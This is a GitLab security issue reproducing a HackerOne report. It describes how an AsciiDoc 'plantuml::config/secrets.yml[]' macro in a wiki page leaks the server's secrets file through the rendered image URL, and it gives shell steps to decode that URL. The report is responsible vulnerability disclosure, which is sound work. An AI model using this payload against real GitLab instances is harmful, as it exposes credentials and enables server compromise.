Remote file inclusion via Asciidoc plantuml render

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2871063 by yvvdwf on 2024-11-29:

Report | Attachments | How To Reproduce

Report

Gitlab rencently uses new version 0.1.1 of asciidoctor-plantuml which enables BlockMacroProcessor by default BlockMacroProcessor. This allows to read arbitrary files.

Reprocedure

• create a new project, goto its wiki, then add a AsciiDoc file using the following content:

test include file

plantuml::config/secrets.yml[]  

• save the file, then open its rendered file you should see an (error) image which represent a part of config/secrets.yml file

• decode the src attribute of the image to get the complete file content:

###  original url  
url="https://plantuml.gitlab-static.net/png/[REDACTED]"

###  get last element  
string=${url##*/}

echo string

###  decode  
docker run ghcr.io/plantuml/plantuml -decodeurl $string  

Impact

Arbitrary file inclusion leading to remote code execution

Note:

• I've tested this in staging.gitlab.com from 51.195.254.173
• I think that the vulnerable code should be deployed automatically in gitlab.com in few hours. Perhaps you can stop it

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• wiki.png
• secrets.yml.png

How To Reproduce

Please add reproducibility information to this section: